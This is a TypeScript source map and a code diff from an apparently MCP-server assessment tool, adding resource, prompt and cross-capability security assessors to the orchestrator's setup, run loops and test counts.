{"version":3,"file":"AssessmentOrchestrator.d.ts","sourceRoot":"","sources":["../../../src/services/assessment/AssessmentOrchestrator.ts"],"names":[],"mappings":"AAAA;;;GAGG;AAEH,OAAO,EACL,sBAAsB,EACtB,uBAAuB,EAGvB,kBAAkB,EAClB,gBAAgB,EACjB,MAAM,uBAAuB,CAAC;AAC/B,OAAO,EACL,IAAI,EACJ,2BAA2B,EAC5B,MAAM,oCAAoC,CAAC;AAiC5C,OAAO,EACL,gBAAgB,EAChB,sBAAsB,EAEvB,MAAM,wBAAwB,CAAC;AAwEhC;;GAEG;AACH,MAAM,WAAW,WAAW;IAC1B,GAAG,EAAE,MAAM,CAAC;IACZ,IAAI,CAAC,EAAE,MAAM,CAAC;IACd,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC;CACnB;AAED;;GAEG;AACH,MAAM,WAAW,mBAAmB;IAClC,WAAW,EAAE,MAAM,CAAC;IACpB,IAAI,CAAC,EAAE,MAAM,CAAC;IACd,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC;CACnB;AAED;;GAEG;AACH,MAAM,WAAW,SAAS;IACxB,IAAI,EAAE,MAAM,CAAC;IACb,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,SAAS,CAAC,EAAE,KAAK,CAAC;QAChB,IAAI,EAAE,MAAM,CAAC;QACb,WAAW,CAAC,EAAE,MAAM,CAAC;QACrB,QAAQ,CAAC,EAAE,OAAO,CAAC;KACpB,CAAC,CAAC;CACJ;AAED;;GAEG;AACH,MAAM,WAAW,qBAAqB;IACpC,KAAK,CAAC,EAAE;QAAE,WAAW,CAAC,EAAE,OAAO,CAAA;KAAE,CAAC;IAClC,SAAS,CAAC,EAAE;QAAE,SAAS,CAAC,EAAE,OAAO,CAAC;QAAC,WAAW,CAAC,EAAE,OAAO,CAAA;KAAE,CAAC;IAC3D,OAAO,CAAC,EAAE;QAAE,WAAW,CAAC,EAAE,OAAO,CAAA;KAAE,CAAC;IACpC,OAAO,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;IAClC,YAAY,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;CACxC;AAED,MAAM,WAAW,iBAAiB;IAChC,UAAU,EAAE,MAAM,CAAC;IACnB,KAAK,EAAE,IAAI,EAAE,CAAC;IACd,QAAQ,EAAE,CACR,IAAI,EAAE,MAAM,EACZ,MAAM,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,KAC5B,OAAO,CAAC,2BAA2B,CAAC,CAAC;IAC1C,aAAa,CAAC,EAAE,MAAM,CAAC;IACvB,WAAW,CAAC,EAAE,OAAO,CAAC;IACtB,WAAW,CAAC,EAAE,OAAO,CAAC;IACtB,aAAa,CAAC,EAAE,OAAO,CAAC;IACxB,MAAM,EAAE,uBAAuB,CAAC;IAChC,UAAU,CAAC,EAAE;QACX,IAAI,EAAE,MAAM,CAAC;QACb,OAAO,CAAC,EAAE,MAAM,CAAC;QACjB,QAAQ,CAAC,EAAE,OAAO,CAAC;KACpB,CAAC;IAIF,cAAc,CAAC,EAAE,MAAM,CAAC;IACxB,eAAe,CAAC,EAAE,GAAG,CAAC,MAAM,EAAE,MAAM,CAAC,CAAC;IAGtC,YAAY,CAAC,EAAE,kBAAkB,CAAC;IAClC,WAAW,CAAC,EAAE,MAAM,CAAC;IAIrB,UAAU,CAAC,EAAE,gBAAgB,CAAC;IAG9B,SAAS,CAAC,EAAE,WAAW,EAAE,CAAC;IAC1B,iBAAiB,CAAC,EAAE,mBAAmB,EAAE,CAAC;IAC1C,OAAO,CAAC,EAAE,SAAS,EAAE,CAAC;IACtB,kBAAkB,CAAC,EAAE,qBAAqB,CAAC;IAG3C,YAAY,CAAC,EAAE,CAAC,GAAG,EAAE,MAAM,KAAK,OAAO,CAAC,MAAM,CAAC,CAAC;IAChD,SAAS,CAAC,EAAE,CACV,IAAI,EAAE,MAAM,EACZ,IAAI,EAAE,MAAM,CAAC,MAAM,EAAE,MAAM,CAAC,KACzB,OAAO,CAAC;QAAE,QAAQ,EAAE,KAAK,CAAC;YAAE,IAAI,EAAE,MAAM,CAAC;YAAC,OAAO,EAAE,MAAM,CAAA;SAAE,CAAC,CAAA;KAAE,CAAC,CAAC;IAGrE,eAAe,CAAC,EAAE;QAChB,IAAI,EAAE,OAAO,GAAG,KAAK,GAAG,iBAAiB,CAAC;QAC1C,GAAG,CAAC,EAAE,MAAM,CAAC;QACb,OAAO,CAAC,EAAE,OAAO,CAAC;QAClB,YAAY,CAAC,EAAE,OAAO,CAAC;KACxB,CAAC;CACH;AAED,qBAAa,sBAAsB;IACjC,OAAO,CAAC,MAAM,CAA0B;IACxC,OAAO,CAAC,SAAS,CAAa;IAC9B,OAAO,CAAC,aAAa,CAAa;IAGlC,OAAO,CAAC,YAAY,CAAC,CAAmB;IACxC,OAAO,CAAC,aAAa,CAAkB;IAGvC,OAAO,CAAC,qBAAqB,CAAwB;IACrD,OAAO,CAAC,gBAAgB,CAAmB;IAC3C,OAAO,CAAC,qBAAqB,CAAwB;IACrD,OAAO,CAAC,qBAAqB,CAAwB;IACrD,OAAO,CAAC,iBAAiB,CAAoB;IAG7C,OAAO,CAAC,eAAe,CAAC,CAA4B;IAGpD,OAAO,CAAC,qBAAqB,CAAC,CAAwB;IACtD,OAAO,CAAC,sBAAsB,CAAC,CAAyB;IACxD,OAAO,CAAC,2BAA2B,CAAC,CAA8B;IAClE,OAAO,CAAC,0BAA0B,CAAC,CAA6B;IAChE,OAAO,CAAC,mBAAmB,CAAC,CAAsB;IAClD,OAAO,CAAC,0BAA0B,CAAC,CAA6B;IAChE,OAAO,CAAC,gBAAgB,CAAC,CAAmB;IAG5C,OAAO,CAAC,gBAAgB,CAAC,CAAmB;IAC5C,OAAO,CAAC,cAAc,CAAC,CAAiB;IACxC,OAAO,CAAC,uBAAuB,CAAC,CAAkC;gBAEtD,MAAM,GAAE,OAAO,CAAC,uBAAuB,CAAM;IAsFzD;;;OAGG;IACH,OAAO,CAAC,sBAAsB;IAiB9B;;;OAGG;IACH,gBAAgB,CAAC,MAAM,CAAC,EAAE,OAAO,CAAC,sBAAsB,CAAC,GAAG,IAAI;IAqBhE;;OAEG;IACH,eAAe,IAAI,OAAO;IAI1B;;OAEG;IACH,eAAe,IAAI,gBAAgB,GAAG,SAAS;IAI/C;;OAEG;IACH,OAAO,CAAC,kBAAkB;IAqC1B;;OAEG;IACG,iBAAiB,CACrB,OAAO,EAAE,iBAAiB,GACzB,OAAO,CAAC,sBAAsB,CAAC;IAmflC;;OAEG;IACG,MAAM,CACV,UAAU,EAAE,MAAM,EAClB,KAAK,EAAE,IAAI,EAAE,EACb,QAAQ,EAAE,CACR,IAAI,EAAE,MAAM,EACZ,MAAM,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,KAC5B,OAAO,CAAC,2BAA2B,CAAC,EACzC,UAAU,CAAC,EAAE,GAAG,EAChB,aAAa,CAAC,EAAE,MAAM,EACtB,WAAW,CAAC,EAAE,GAAG,GAChB,OAAO,CAAC,sBAAsB,CAAC;IAclC,OAAO,CAAC,qBAAqB;IAsE7B,OAAO,CAAC,sBAAsB;IAoB9B,OAAO,CAAC,eAAe;IA8DvB,OAAO,CAAC,uBAAuB;IAc/B;;OAEG;IACH,SAAS,IAAI,uBAAuB;IAIpC;;OAEG;IACH,YAAY,CAAC,MAAM,EAAE,OAAO,CAAC,uBAAuB,CAAC,GAAG,IAAI;CAG7D"}
|
|
@@ -19,6 +19,10 @@ import { ManifestValidationAssessor } from "./modules/ManifestValidationAssessor
|
|
|
19
19
|
import { PortabilityAssessor } from "./modules/PortabilityAssessor.js";
|
|
20
20
|
import { ExternalAPIScannerAssessor } from "./modules/ExternalAPIScannerAssessor.js";
|
|
21
21
|
import { TemporalAssessor } from "./modules/TemporalAssessor.js";
|
|
22
|
+
// New capability assessors
|
|
23
|
+
import { ResourceAssessor } from "./modules/ResourceAssessor.js";
|
|
24
|
+
import { PromptAssessor } from "./modules/PromptAssessor.js";
|
|
25
|
+
import { CrossCapabilitySecurityAssessor } from "./modules/CrossCapabilitySecurityAssessor.js";
|
|
22
26
|
// Pattern configuration for tool annotation assessment
|
|
23
27
|
import { loadPatternConfig, compilePatterns, } from "./config/annotationPatterns.js";
|
|
24
28
|
// Claude Code integration for intelligent analysis
|
|
@@ -91,6 +95,10 @@ export class AssessmentOrchestrator {
|
|
|
91
95
|
portabilityAssessor;
|
|
92
96
|
externalAPIScannerAssessor;
|
|
93
97
|
temporalAssessor;
|
|
98
|
+
// New capability assessors
|
|
99
|
+
resourceAssessor;
|
|
100
|
+
promptAssessor;
|
|
101
|
+
crossCapabilityAssessor;
|
|
94
102
|
constructor(config = {}) {
|
|
95
103
|
this.config = { ...DEFAULT_ASSESSMENT_CONFIG, ...config };
|
|
96
104
|
// Initialize Claude Code Bridge if enabled in config
|
|
@@ -144,6 +152,16 @@ export class AssessmentOrchestrator {
|
|
|
144
152
|
if (this.config.assessmentCategories?.temporal) {
|
|
145
153
|
this.temporalAssessor = new TemporalAssessor(this.config);
|
|
146
154
|
}
|
|
155
|
+
// Initialize new capability assessors
|
|
156
|
+
if (this.config.assessmentCategories?.resources) {
|
|
157
|
+
this.resourceAssessor = new ResourceAssessor(this.config);
|
|
158
|
+
}
|
|
159
|
+
if (this.config.assessmentCategories?.prompts) {
|
|
160
|
+
this.promptAssessor = new PromptAssessor(this.config);
|
|
161
|
+
}
|
|
162
|
+
if (this.config.assessmentCategories?.crossCapability) {
|
|
163
|
+
this.crossCapabilityAssessor = new CrossCapabilitySecurityAssessor(this.config);
|
|
164
|
+
}
|
|
147
165
|
}
|
|
148
166
|
// Wire up Claude bridge to TestDataGenerator for intelligent test generation
|
|
149
167
|
if (this.claudeBridge) {
|
|
@@ -227,6 +245,16 @@ export class AssessmentOrchestrator {
|
|
|
227
245
|
if (this.portabilityAssessor) {
|
|
228
246
|
this.portabilityAssessor.resetTestCount();
|
|
229
247
|
}
|
|
248
|
+
// Reset new capability assessors
|
|
249
|
+
if (this.resourceAssessor) {
|
|
250
|
+
this.resourceAssessor.resetTestCount();
|
|
251
|
+
}
|
|
252
|
+
if (this.promptAssessor) {
|
|
253
|
+
this.promptAssessor.resetTestCount();
|
|
254
|
+
}
|
|
255
|
+
if (this.crossCapabilityAssessor) {
|
|
256
|
+
this.crossCapabilityAssessor.resetTestCount();
|
|
257
|
+
}
|
|
230
258
|
}
|
|
231
259
|
/**
|
|
232
260
|
* Run a complete assessment on an MCP server
|
|
@@ -324,6 +352,34 @@ export class AssessmentOrchestrator {
|
|
|
324
352
|
return (assessmentResults.temporal = r);
|
|
325
353
|
}));
|
|
326
354
|
}
|
|
355
|
+
// New capability assessors
|
|
356
|
+
if (this.resourceAssessor) {
|
|
357
|
+
const resourceCount = (context.resources?.length || 0) +
|
|
358
|
+
(context.resourceTemplates?.length || 0);
|
|
359
|
+
emitModuleStartedEvent("Resources", resourceCount * 5, resourceCount);
|
|
360
|
+
assessmentPromises.push(this.resourceAssessor.assess(context).then((r) => {
|
|
361
|
+
emitModuleProgress("Resources", r.status, r, this.resourceAssessor.getTestCount());
|
|
362
|
+
return (assessmentResults.resources = r);
|
|
363
|
+
}));
|
|
364
|
+
}
|
|
365
|
+
if (this.promptAssessor) {
|
|
366
|
+
const promptCount = context.prompts?.length || 0;
|
|
367
|
+
emitModuleStartedEvent("Prompts", promptCount * 10, promptCount);
|
|
368
|
+
assessmentPromises.push(this.promptAssessor.assess(context).then((r) => {
|
|
369
|
+
emitModuleProgress("Prompts", r.status, r, this.promptAssessor.getTestCount());
|
|
370
|
+
return (assessmentResults.prompts = r);
|
|
371
|
+
}));
|
|
372
|
+
}
|
|
373
|
+
if (this.crossCapabilityAssessor) {
|
|
374
|
+
const capabilityCount = toolCount +
|
|
375
|
+
(context.resources?.length || 0) +
|
|
376
|
+
(context.prompts?.length || 0);
|
|
377
|
+
emitModuleStartedEvent("Cross-Capability", capabilityCount * 3, capabilityCount);
|
|
378
|
+
assessmentPromises.push(this.crossCapabilityAssessor.assess(context).then((r) => {
|
|
379
|
+
emitModuleProgress("Cross-Capability", r.status, r, this.crossCapabilityAssessor.getTestCount());
|
|
380
|
+
return (assessmentResults.crossCapability = r);
|
|
381
|
+
}));
|
|
382
|
+
}
|
|
327
383
|
await Promise.all(assessmentPromises);
|
|
328
384
|
}
|
|
329
385
|
else {
|
|
@@ -404,6 +460,30 @@ export class AssessmentOrchestrator {
|
|
|
404
460
|
await this.temporalAssessor.assess(context);
|
|
405
461
|
emitModuleProgress("Temporal", assessmentResults.temporal.status, assessmentResults.temporal, this.temporalAssessor.getTestCount());
|
|
406
462
|
}
|
|
463
|
+
// New capability assessors (sequential)
|
|
464
|
+
if (this.resourceAssessor) {
|
|
465
|
+
const resourceCount = (context.resources?.length || 0) +
|
|
466
|
+
(context.resourceTemplates?.length || 0);
|
|
467
|
+
emitModuleStartedEvent("Resources", resourceCount * 5, resourceCount);
|
|
468
|
+
assessmentResults.resources =
|
|
469
|
+
await this.resourceAssessor.assess(context);
|
|
470
|
+
emitModuleProgress("Resources", assessmentResults.resources.status, assessmentResults.resources, this.resourceAssessor.getTestCount());
|
|
471
|
+
}
|
|
472
|
+
if (this.promptAssessor) {
|
|
473
|
+
const promptCount = context.prompts?.length || 0;
|
|
474
|
+
emitModuleStartedEvent("Prompts", promptCount * 10, promptCount);
|
|
475
|
+
assessmentResults.prompts = await this.promptAssessor.assess(context);
|
|
476
|
+
emitModuleProgress("Prompts", assessmentResults.prompts.status, assessmentResults.prompts, this.promptAssessor.getTestCount());
|
|
477
|
+
}
|
|
478
|
+
if (this.crossCapabilityAssessor) {
|
|
479
|
+
const capabilityCount = toolCount +
|
|
480
|
+
(context.resources?.length || 0) +
|
|
481
|
+
(context.prompts?.length || 0);
|
|
482
|
+
emitModuleStartedEvent("Cross-Capability", capabilityCount * 3, capabilityCount);
|
|
483
|
+
assessmentResults.crossCapability =
|
|
484
|
+
await this.crossCapabilityAssessor.assess(context);
|
|
485
|
+
emitModuleProgress("Cross-Capability", assessmentResults.crossCapability.status, assessmentResults.crossCapability, this.crossCapabilityAssessor.getTestCount());
|
|
486
|
+
}
|
|
407
487
|
}
|
|
408
488
|
// Integrate temporal findings into security.vulnerabilities for unified view
|
|
409
489
|
if (assessmentResults.temporal?.rugPullsDetected &&
|
|
@@ -466,6 +546,10 @@ export class AssessmentOrchestrator {
|
|
|
466
546
|
const portabilityCount = this.portabilityAssessor?.getTestCount() || 0;
|
|
467
547
|
const externalAPICount = this.externalAPIScannerAssessor?.getTestCount() || 0;
|
|
468
548
|
const temporalCount = this.temporalAssessor?.getTestCount() || 0;
|
|
549
|
+
// New capability assessor counts
|
|
550
|
+
const resourcesCount = this.resourceAssessor?.getTestCount() || 0;
|
|
551
|
+
const promptsCount = this.promptAssessor?.getTestCount() || 0;
|
|
552
|
+
const crossCapabilityCount = this.crossCapabilityAssessor?.getTestCount() || 0;
|
|
469
553
|
console.log("[AssessmentOrchestrator] Test counts by assessor:", {
|
|
470
554
|
functionality: functionalityCount,
|
|
471
555
|
security: securityCount,
|
|
@@ -480,6 +564,9 @@ export class AssessmentOrchestrator {
|
|
|
480
564
|
portability: portabilityCount,
|
|
481
565
|
externalAPIScanner: externalAPICount,
|
|
482
566
|
temporal: temporalCount,
|
|
567
|
+
resources: resourcesCount,
|
|
568
|
+
prompts: promptsCount,
|
|
569
|
+
crossCapability: crossCapabilityCount,
|
|
483
570
|
});
|
|
484
571
|
total =
|
|
485
572
|
functionalityCount +
|
|
@@ -494,7 +581,10 @@ export class AssessmentOrchestrator {
|
|
|
494
581
|
manifestCount +
|
|
495
582
|
portabilityCount +
|
|
496
583
|
externalAPICount +
|
|
497
|
-
temporalCount
|
|
584
|
+
temporalCount +
|
|
585
|
+
resourcesCount +
|
|
586
|
+
promptsCount +
|
|
587
|
+
crossCapabilityCount;
|
|
498
588
|
console.log("[AssessmentOrchestrator] Total test count:", total);
|
|
499
589
|
return total;
|
|
500
590
|
}
|